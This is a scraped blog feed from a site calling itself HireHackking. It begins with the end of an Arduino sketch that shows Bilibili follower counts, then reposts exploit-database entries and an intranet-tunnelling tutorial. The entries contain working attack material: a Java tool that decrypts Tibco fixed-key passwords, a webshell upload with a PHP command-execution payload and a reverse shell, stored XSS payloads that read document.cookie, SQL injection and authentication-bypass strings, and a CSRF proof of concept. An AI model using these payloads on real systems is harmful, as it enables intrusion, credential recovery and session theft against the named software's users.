fans long view=0; //Number of plays long likes=0; //Number of likes received void setup() { //OLED initialization u8g2.begin(); u8g2.enableUTF8Print(); u8g2.clearDisplay(); u8g2.setFont(u8g2_font_wqy12_t_gb2312a); u8g2.drawXBMP( 16 , 9 , 24 , 24 , bilibilitv_24u ); u8g2.setCursor(45, 19); u8g2.print('Powered by'); u8g2.setCursor(45, 31); u8g2.print('Xiaoyaozi's big cousin'); u8g2.setFont(u8g2_font_wqy12_t_gb2312a); u8g2.setCursor(10, 50); u8g2.print('blog.bbskali.cn'); u8g2.sendBuffer(); delay(5000); u8g2.setFont(u8g2_font_wqy12_t_gb2312b); u8g2.setFontPosTop(); u8g2.clearDisplay(); Serial.begin(115200); //WiFi connection WiFi.begin(ssid, password); while (WiFi.status() !=WL_CONNECTED) { delay(500); Serial.print('.'); } Serial.println(''); Serial.println('WiFi connected'); timer.attach(60, timerCallback); //Every 1 minute //The first call to obtain the data function, which is convenient for display when powered on getFollower(followerUrl); getViewAndLikes(viewAndLikesUrl); } void loop() { While (flag) { if (count==0) { //display data Serial.println('count=0, display data'); u8g2.firstPage(); do { display(follower, likes, view); } while (u8g2.nextPage()); flag=false; } else if (count==1) { //get follower Serial.println('count=1, get follower'); getFollower(followerUrl); flag=false; } else if (count==2) { //get view and likes Serial.println('count=2, get view and likes'); getViewAndLikes(viewAndLikesUrl); flag=false; } } } //Timer callback function void timerCallback() { count++; if (count==3) { count=0; } flag=true; } //Get the number of fans on B station void getFollower(String url) { HTTPClient http; http.begin(url); int httpCode=http.GET(); Serial.printf('[HTTP] GET. code: %d\n', httpCode); if (httpCode==200) { Serial.println('Get OK'); String resBuff=http.getString(); //---------- ArduinoJson V5 ---------- JsonObject root=jsonBuffer.parseObject(resBuff); if (!root.success()) { Serial.println('parseObject() failed'); return; } follower=root['data']['follower']; Serial.print('Fans:'); Serial.println(follower); } else { Serial.printf('[HTTP] GET. failed, error: %d\n', httpCode); } http.end(); } //Get the number of plays and likes on B station void getViewAndLikes(String url) { HTTPClient http; http.begin(url); int httpCode=http.GET(); Serial.printf('[HTTP] GET. code: %d\n', httpCode); if (httpCode==200) { Serial.println('Get OK'); String resBuff=http.getString(); //---------- ArduinoJson V5 ---------- JsonObject root=jsonBuffer.parseObject(resBuff); if (!root.success()) { Serial.println('parseObject() failed'); return; } likes=root['data']['like_num']; view=root['data']['archive_count']; Serial.print('Likes:'); Serial.println(likes); Serial.print('View:'); Serial.println(view); } else { Serial.printf('[HTTP] GET. failed, error: %d\n', httpCode); } http.end(); } //OLED display data void display(long follower, long likes, long view) { u8g2.clearDisplay(); u8g2.setCursor(5, 25); u8g2.print('Number of fans:' + String(follower)); u8g2.setCursor(5, 39); u8g2.print('Number of likes:' + String(likes)); u8g2.setCursor(5, 52); u8g2.print('Number of manuscripts:' + String(view)); u8g2.setCursor(5, 6); u8g2.print('bilibili@' + String(NAME)); //Change it to your own name } Summary of Problems After the code is uploaded, this problem occurs when the display screen does not light up. Check whether your connection is normal. Whether the corresponding pin D1 D2 is suitable. Of course, you can modify the following commands to customize the pins. U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/D2, /* data=*/D1, /* reset=*/U8X8_PIN_NONE); Regarding the interface, most API interfaces on Bilibili are currently https. For https we need to configure the certificate information in esp8266. More troublesome. I searched the interface in the article for a long time before I found two interfaces of the available http protocol. (Of course, it will also hang up at any time). So, on this basis, the way I thought of is to save the json data from the API interface locally using python. Then just access the json data locally. At the same time, do scheduled tasks to update data in real time.
  6. HireHackking

    Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption # Date: December 8th 2020 # Exploit Author: Tess Sluijter # Vendor Homepage: https://www.tibco.com # Version: 5.11x and before # Tested on: MacOS, Linux, Windows # Tibco password decryption exploit ## Background Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling: 1. Using a custom key. 2. Using a machine key. 3. Using a fixed key. https://docs.tibco.com/pub/runtime_agent/5.11.1/doc/pdf/TIB_TRA_5.11.1_installation.pdf?id=2 This write-up pertains to #3 above. Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA". ## Issues On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example: * https://support.tibco.com/s/article/Tibco-KnowledgeArticle-Article-30338 * https://community.tibco.com/questions/password-encryptiondecryption * https://community.tibco.com/questions/deobfuscatedecrypt-namevaluepairpassword-gv-file * https://community.tibco.com/questions/bw6-password-decrypt * http://tibcoworldin.blogspot.com/2012/08/decrypting-password-data-type-global.html * http://tibcoshell.blogspot.com/2016/07/how-to-decrypt-encryptedmasked-password.html ## Impact Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software. ## Instructions Compile with: javac decrypt.java Examples of running, with secrets retrieved from websites and forums: java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA 7474 java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP tibco /* comments! Compile with: javac decrypt.java Run as: java Decrypt oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA 7474 java Decrypt BFBiFqp/qhvyxrTdjGtf/9qxlPCouNSP tibco */ import java.io.ByteArrayInputStream; import java.util.Arrays; import java.util.Base64; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.spec.SecretKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.CipherInputStream; import javax.crypto.CipherOutputStream; class Decrypt { public static void main (String [] arguments) { try { byte[] keyBytes = { 28, -89, -101, -111, 91, -113, 26, -70, 98, -80, -23, -53, -118, 93, -83, -17, 28, -89, -101, -111, 91, -113, 26, -70 }; String algo = "DESede/CBC/PKCS5Padding"; String encryptedText = arguments[0]; byte[] message = Base64.getDecoder().decode(encryptedText); ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message); Cipher decipher = Cipher.getInstance(algo); int i = decipher.getBlockSize(); byte[] ivSetup = new byte[i]; byteArrayInputStream.read(ivSetup); SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede"); decipher.init(2, key, new IvParameterSpec(ivSetup)); // Magic, I admit I don't understand why this is needed. CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher); char[] plaintext; char[] arrayOfChar1 = new char[(message.length - i) / 2]; byte[] arrayOfByte4 = new byte[2]; byte b = 0; while (2 == cipherInputStream.read(arrayOfByte4, 0, 2)) { arrayOfChar1[b++] = (char)((char)arrayOfByte4[1] << '\b' | (char)arrayOfByte4[0]); } cipherInputStream.close(); if (b == arrayOfChar1.length) { plaintext = arrayOfChar1; } else { char[] arrayOfChar = new char[b]; System.arraycopy(arrayOfChar1, 0, arrayOfChar, 0, b); for (b = 0; b < arrayOfChar1.length; b++) { arrayOfChar1[b] = Character.MIN_VALUE; } plaintext = arrayOfChar; // End of Magic } System.out.println(plaintext); } catch (Exception ex) { System.out.println("Barf..."); System.out.println(ex); } } }
  7. HireHackking

    Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Task Management System 1.0 - Unrestricted File Upload to Remote Code Execution # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Upload a php payload ( i used the default php webshell in /usr/share/webshells/php/php-reverse-shell.php) or a jpeg image embeded with a php payload. ("exiftool -Comment='<?php system($_GET['cmd']); ?>' r0b0t.jpg") Then update profile. Step 4: Click on username on header again and select Manage Account. Step 5: Right click on the uploaded php payload or embeded image located under the "choose avatar form" then copy image location. Step 6: Start nc listener and paste the url in browser. This will trigger the remote code execution if you used a php shell. ( http://localhost/assets/uploads/1607438280_shell.php )
  8. HireHackking

    Task Management System 1.0 - 'First Name and Last Name' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Task Management System 1.0 - 'First Name and Last Name' Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the CMS with any valid user credentials. Step 2: Click on the logged in username on header and select Manage Account. Step 3: Rename the user First Name or Last Name to " <script>alert(document.domain)</script> ". Step 4: Update Profile and this will trigger the XSS. Step 5: Logout and login again and the page will display the domain name.
  9. HireHackking

    Barcodes generator 1.0 - 'name' Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting # Date: 10/12/2020 # Exploit Author: Nikhil Kumar # Vendor Homepage: http://egavilanmedia.com/ # Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/ # Version: 1.0 # Tested On: Ubuntu 1. Open the index.php page using following url http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php click on the New Barcode 2. Intercept the request through burp suite Put a payload on "name=" parameter Payload :- abc"><script>alert("XSS")</script> Malicious Request:: POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 6 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php Upgrade-Insecure-Requests: 1 name=abc"><script>alert("XSS")</script>
  10. HireHackking

    Task Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Task Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-08 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1. Log into application with credentials Step 2. Click on Projects Step 3. Select View Projects Step 4. Choose any project, click on action and select view Step 5. Capture the request of the "page=view_project&id=" page in burpsute Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs " Step 7. This will inject successfully and you will have an information disclosure of all databases contents --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=view_project&id=3 AND 5169=5169 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- - ---
  11. HireHackking

    PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path # Discovery by: Zaira Alquicira # Discovery Date: 2020-12-10 # Vendor Homepage: https://pdf-complete.informer.com/3.5/ # Tested Version: 3.5.310.2002 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v """ PDF Complete PDF Complete C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto # Service info: C:\Users\TOSHIBA>sc qc "pdfcDispatcher" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: pdfcDispatcher TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PDF Document Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  12. HireHackking

    Library Management System 2.0 - Auth Bypass SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection # Date: 2020-12-09 # Exploit Author: Manish Solanki # Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code # Version: 2.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: admin page #Exploit Open the Application check the URL: http://localhost/eb_magalona_lms Open Admin Login Enter username: a' or 1=1-- Enter password: ' click on login The SQL payload gets executed and authorization is bypassed successfully
  13. HireHackking

    Openfire 4.6.0 - 'path' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Openfire 4.6.0 - 'path' Stored XSS # Date: 20201209 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/nodejs/nodejs.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 60 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819 Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
  14. HireHackking

    OpenCart 3.0.3.6 - Cross Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery # Date: 12-11-2020 # Exploit Author: Mahendra Purbia {Mah3Sec} # Vendor Homepage: https://www.opencart.com # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: OpenCart CMS - 3.0.3.6 # Tested on: Kali Linux #Description: This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart. #Additional Information: well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability. Attack Vector: 1. create two accounts A(attacker) & B(victim) 2. login with A and add a product in cart and capture that particular request in burpsuite. 3. Now change the quantity if want and then create a csrf poc of that request. 4. Save it as .html and send it to victim. Now the product added to victims cart. #POC: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST"> <input type="hidden" name="product&#95;id" value="43" /> <input type="hidden" name="quantity" value="10000000" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  15. HireHackking

    Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting # Date: 11/12/2020 # Exploit Author: gx1 # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://updates.jenkins-ci.org/download/war/ # Version: <= 2.251 and <= LTS 2.235.3 # Tested on: any # CVE : CVE-2020-2229 # References: https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955 https://www.openwall.com/lists/oss-security/2020/08/12/4 Vendor Description: Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons. Tooltip values can be contributed by plugins, some of which use user-specified values. This results in a stored cross-site scripting (XSS) vulnerability. Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons. Technical Details and Exploitation: As it is possible to observe from patch commit: https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6 The fix to solve the vulnerability is applied to 'core/src/main/resources/lib/layout/svgIcon.jelly' tooltip attribute: <svg class="svg-icon ${attrs.class}" viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}" focusable="${attrs.focusable != null ? attrs.focusable : 'false'}" aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}" style="${attrs.style}" onclick="${attrs.onclick}" tooltip="${h.xmlEscape(attrs.tooltip ?: '')}"> svgIcon is a layout element belonging to jenkins core: https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon As suggested by Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/) "Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations don’t result in surprising behavior." Tooltip attribute can contain HTML code, as suggested in form section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/ For this reason, it is possible to inject XSS code in a Jenkins system by uploading a plugin that contains an <j:svgIcon> element containing a malicious XSS payload in tooltip attribute: <l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon> To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ . To obtain information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins Proof Of Concept: 1. Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element. 2. Generate a plugin. For example, you can create a class that implements ModelObjectWithContextMenu interface to create a context menu and implement the method getUrlName() containing a <plugin-url> string that you can navigate by using the link: http(s)://<jenkins_server>/<plugin-url> 3. In jelly file, insert the following element: <l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon> This creates an icon that triggers the Cross-Site Scripting when the mouse is over and opens tooltip. Obviously, you can use css and large size and height to generate a svg element that covers all the screen in order to trigger the XSS when the user navigates the page. Solution: The following releases contain fixes for security vulnerabilities: * Jenkins 2.252 * Jenkins LTS 2.235.4
  16. HireHackking

    WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting # Date: 11/27/2020 # Exploit Author: Ilca Lucian Florin # Vendor Homepage: https://sygnoos.com # Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/ # Version: <= 3.69.6 # Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter Plugin is vulnerable to stored cross site scripting. There are multiple parameters vulnerable to cross site scripting. All versions up to 3.69.6 are vulnerable to stored cross site scripting. More information about this plugin could be found on the following links: 1. https://wordpress.org/plugins/popup-builder/ 2. https://popup-builder.com/ Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. A successful cross site scripting attack can have devastating consequences for an online business’s reputation and its relationship with its clients. Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. # How to reproduce # 1. Login as Editor or Administrator: https://website.com/wp-login/ 2. Go to the following link: https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for PopUp Builder and select or create new PopUp. 2. Click edit 3. Search and find: # Custom JS or CSS 4. On JS -> Opening events section, add two payloads, one for #2 section and one for #3 section, like in the following example: #2 Add the code you want to run before the popup opens. This will be the code that will work in the process of opening the popup. true/false conditions will not work in this phase. <textarea class="wp-editor-area editor-content" data-attr-event="WillOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-WillOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea> #3 Add the code you want to run after the popup opens. This code will work when the popup is already open on the page. <textarea class="wp-editor-area editor-content" data-attr-event="DidOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-DidOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea> 5. Click Update 6. Go to https://website.com. The XSS alert will pop up. # All text-areas from JS section are vulnerable to stored cross site scripting. Evidence: 1. https://ibb.co/JvBTq0H 2. https://ibb.co/0KP7NFQ 3. https://ibb.co/3cFnVYF
  17. HireHackking

    Medical Center Portal Management System 1.0 - Multiple Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1: Log in to the application with any valid user credentials. Step 2: Click on "Medical Products", select "Add Medical Products", use "<scrip>alert(1)</script>" in both name ad description fields. Complete the other fields and save product. Step 3: Once you click on save, this should trigger the XSS payload. clicking on the "Medical Products" page anytime will trigger the Stored XSS Payload Note: Same method applies to "Add New Hospital | Pharmacy page" Step 1: Use "<scrip>alert("r0b0tG4nG")</script>" as hospital/pharmacy name, fill the other required information and click on save. Your payload will be executed anytime you click on "Medical Products" page or "Add New Hospital | Pharmacy page" page.
  18. HireHackking

    Openfire 4.6.0 - 'users' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Openfire 4.6.0 - 'users' Stored XSS # Date: 2020/12/11 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 144 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E Vulnerable parameters:users payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
  19. HireHackking

    Openfire 4.6.0 - 'groupchatJID' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS # Date: 2020/12/11 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 144 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users= Vulnerable parameters:groupchatJID payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
  20. HireHackking

    Openfire 4.6.0 - 'sql' Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS # Date: 20201211 # Exploit Author: j5s # Vendor Homepage: https://github.com/igniterealtime/Openfire # Software Link: https://www.igniterealtime.org/downloads/ # Version: 4.6.0 POST /plugins/dbaccess/db-access.jsp HTTP/1.1 Host: 192.168.137.137:9090 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Length: 78 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819 Origin: http://192.168.137.137:9090 Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E Vulnerable parameters:sql payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
  21. HireHackking

    Title: Intranet mapping artifact nps

    HireHackking posted a blog entry in Hacker Technology
    In a previous article. We talked about how to use FRP for intranet mapping. This allows intranet devices to be logged in through the public network. However, frp is relatively implemented by configuring command parameters. It's still a bit challenging for Xiaobai. Today I will introduce another simple method. About NPS nps is a lightweight, high-performance, and powerful intranet penetration proxy server. Currently, it supports tcp and udp traffic forwarding, and can support any tcp and udp upper-layer protocol (access to intranet websites, local payment interface debugging, SSH access, remote desktop, intranet dns resolution, etc.). In addition, it also supports intranet ttp proxy and intranet socks5 proxy, and has a powerful web management end. Experimental Environment Public network vps (server centos7) user side (kali linux, Windows 10) Download nps First, download it to the project address according to your own system type. The server is linux_arm64_server.tar.gz The client is windows_amd64_client.tar.gz Installing the server Download the server side according to the type of the public network server. mkdir nps cd wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz tar -zxvf linux_amd64_server.tar.gz configuration nps.confvim conf/nps.conf modification part #web web_host=a.o.com —— Cloud server public IP address web_username=admin ——web console account settings web_password=123 ——web console password settings web_port=8080 web_ip=0.0.0.0 web_base_url= web_open_ssl=false web_cert_file=conf/server.pem web_key_file=conf/server.key Install nps execution command ./nps install ./nps start #Start Access the web console Browser access ip:8080 (the corresponding ports need to be opened for security group and firewall) Enter the account number and password in your configuration file to log in. As mentioned above, after logging in to the background, we only need to add the mapped target in the background according to actual needs. Add mapping directory After the configuration is completed, click Submit. Then click on the client and add a new client. Record the key! Click tcp—— to add and fill in the corresponding parameters according to the actual situation. Note that the client ID is the client ID we created in the previous step. Configure client Here, let’s take kali’s port 22 as an example. First, download the corresponding client linux_arm64_client.tar.gz. mkdir nps wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_arm64_client.tar.gz tar -zxvf linux_arm64_client.tar.gz is decompressed, the file is as follows Connect We only need the following command to achieve the connection. ./npc -server=Public IP:8024 -vkey=Your client key -type=tcp The client has also been successfully launched. Test
  22. HireHackking

